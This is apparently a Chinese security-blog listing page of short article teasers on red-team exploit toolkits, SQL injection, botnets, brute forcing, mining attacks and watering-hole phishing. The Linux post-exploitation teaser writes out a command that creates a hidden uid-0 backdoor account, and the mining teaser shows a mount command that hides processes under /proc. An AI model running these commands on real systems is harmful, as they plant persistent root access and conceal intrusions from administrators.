XXX集团SQL注入漏洞
厂商名称:XXXX集团有限公司 漏洞标题:XXXX集团有限公司 XXXX 微信小程序存在SQL注入漏洞 漏洞类型:事件型 任意账户接管漏洞 网站名称:XXXX微信小程序 漏洞等级:严重 漏洞简述:XXXX集团有...
红队武器库漏洞利用工具合集整理(7月24日更新)
目录红队武器库漏洞利用工具合集整理,解压密码:LightDream海康威视Hikvision综合漏洞利用工具 大华Dahua综合漏洞利用工具 Nacos综合漏洞利用工具 Vcenter综合漏洞利用工具 Fastjson漏洞批量检...
远程安全评估系统(RAS):你有漏洞,我不漏扫
前言 一个真相:一切网络攻击,都是从安全漏洞开始的,网络攻击,从漏洞开始,就让“她“成为您身边专业的“漏洞管理专家”,你的漏洞,以后有了她,不再漏扫。 漏洞,相信很多人都不陌生,特指...
【系统分享】靶场练习系统合集
0x00前言制作者:许心痕QQ2063367671账户用户名:anhunsec账户密码:1234申明:此系统只是为了方便大家进行渗透测试的练习,从而免去系统环境准备和搭建靶场平台的时间。也就是说已经用虚拟机帮...
蓝队能力自查 | 红队实战攻击利用技术汇总
前言为了帮助蓝队更好地进行能力自查和提升,塞讯验证对日常红队场景中的实战攻击利用技术进行了全面的总结和提炼。从不同的渗透阶段出发,梳理每个阶段可能使用的技术。我们将在后续文章中对红...
日常渗透刷洞的一些小工具
SecurityServiceBox:一个Windows平台下既可以满足安服仔日常渗透工作也可以批量刷洞的工具盒子。大佬轻喷项目地址x01 前言作为一个安服仔,日常渗透中,不同阶段所使用的工具是不同的,除开自...
使用nethunter控制4G可控继电器开关闭灯光系统
前言:作者;IKUNQQ:643690991QQ群:603791426参考文章S-Clustr+Nets3e 僵尸网络&偷拍照片插件 - FreeBuf网络安全行业门户S-Clustr(影子集群)僵尸网络控制嵌入式设备&个人电脑_s-clustr(影子...
后渗透基础:Linux篇
入侵痕迹隐藏后门帐号添加账号test1,设置uid为0,密码为123456useradd -p `openssl passwd -1 -salt 'salt' 123456` test1 -o -u 0 -g root -G root -s /bin/bash -d /home/test1SSH隐身登录隐...
jboss页面弱口令爆破
Jboss4.0默认页面登录管理启动burpsuit抓包进行弱口令爆破对Basic后面那一段base64进行解码发现是这样的一个格式 账号:密码,所以这里需要添加三个参数并且拼接到一起,这是最好的方式是使用自...
实战linux-XMR挖矿攻击
进程隐藏目录挂载mkdir -p /tmp/.k/null mount --bind /tmp/.k/null /proc命令 mkdir /tmp/.k/null 在Linux或类Unix操作系统中用于创建一个新的目录结构。这个命令的组成部分和它们各自的含义...
独家揭秘:一个FOFA账号大变身,解锁团队协作新境界,成为团队协作的服务神器!
前言在当今的数字化时代,网络安全与信息收集成为企业运营中不可或缺的一环。FOFA(一种网络空间搜索引擎)作为强大的网络资产搜索工具,被广泛应用于安全审计、漏洞挖掘、应急响应等领域。对于...
【黑客技术揭秘】CSFish:自动化水坑钓鱼,让权限维持如丝般顺滑
0x01 前言水坑攻击属于APT攻击的一种,与其他社会工程手段(例如网络钓鱼)相比,水坑攻击的危险性来源于其利用的是不会被列入黑名单的合法网站。黑客无需耗费精力制作钓鱼网站,而是利用合法网站...
【技术实战】揭秘Nginx反向代理配置,守护你的网站免受钓鱼侵害
前言此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信...
